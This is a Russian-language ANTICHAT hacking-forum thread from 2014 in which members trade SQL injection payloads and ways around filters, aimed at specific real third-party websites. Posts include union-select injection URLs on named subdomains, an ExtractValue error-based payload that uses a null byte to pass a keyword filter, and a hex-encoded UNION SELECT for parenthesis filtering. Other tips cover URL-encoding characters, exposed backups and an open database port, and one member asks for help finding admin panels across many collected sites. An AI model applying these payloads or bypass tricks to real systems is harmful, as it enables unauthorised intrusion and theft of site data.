ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.05.2014, 13:29
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме: 70640
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
обясните как. мне очень интересно. как concat('') будет исполнятся. у меня фантазии не хватает.
может какой то индус-кодер во сне написал скрипт где параметры переданные скриптом исполняются на стороне сервера. но только из за этого не стоит написать что
иногда работает
это же не метафизика в конце концов
Скинул пример в ЛС.
Посмотри скрипты, может будет ясно в чем причина.
|
|
|

21.05.2014, 05:49
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
возможно как-то раскрутить?)
Код:
Code:
http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005'
|
|
|

21.05.2014, 20:19
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
возможно как-то раскрутить?)
Код:
Code:
http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005'
Эксплуатация сильно затруднена в связи с тем, что фильтруются скобки.
|
|
|

21.05.2014, 23:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 23349
Репутация:
45
|
|
На соседних поддоментах имеются более перспективные варианты:
Код:
Code:
http://generator.lookmy.info/index.php?id=2677&show=4nalbum&do=showgall&gid=3471 union select 1,@@version,3,4,5,6,7,8-- w
хотя и там не всё так "светло"
|
|
|
|

23.05.2014, 00:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
возможно как-то раскрутить?)
Код:
Code:
http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005'
Возможно, не стоит танцевать с фильтрами, а просто попинать все из http://srv3.lookmy.info/portal/13/ ? К тому же, там лежат многие бекапы, а порт мускула открыт в мир.
|
|
|
|

24.05.2014, 09:34
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от Sanic1977
Sanic1977 said:
Есть скуля, как обойти фильтрацию на "select", на слово "select" выдает 403 Forbidden, пример запроса
?id=1'or(ExtractValue(1,concat(0x3a,(select(count( *))from(website.user)))))=1
Код:
Code:
?id=%001'or(ExtractValue(1,concat(0x3a,(select(count(*))from(website.user)))))or'
Сообщение от BigBear
BigBear said:
Эксплуатация сильно затруднена в связи с тем, что фильтруются скобки.
No problem
Код:
Code:
28006%20and%200%20UNION%20SELECT%200x3120616e64203020554e494f4e2053454c4543542076657273696f6e28292c2032202d2d
Первая скуля подходит даже больше, чем вторая. Инъекция в категориях, там обычно всегда более 1 запроса.
|
|
|

25.05.2014, 14:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
как обойти фильтрацию очки при mysql запросе?
|
|
|
|

26.05.2014, 11:51
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от qaz
qaz said:
как обойти фильтрацию очки при mysql запросе?
%2e
%252e
|
|
|

26.05.2014, 11:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 182660
Репутация:
324
|
|
Иногда бывает что фильтры не работают при пост запросе
|
|
|
|

29.05.2014, 18:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от BigBear
BigBear said:
%2e
%252e
спс, а как из точки получить такое содержимое, что это за тип шифрования?
я примерно догадываюсь что это может быть хекс, только вместо 0х поставили % но как получили второй вариант?
---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|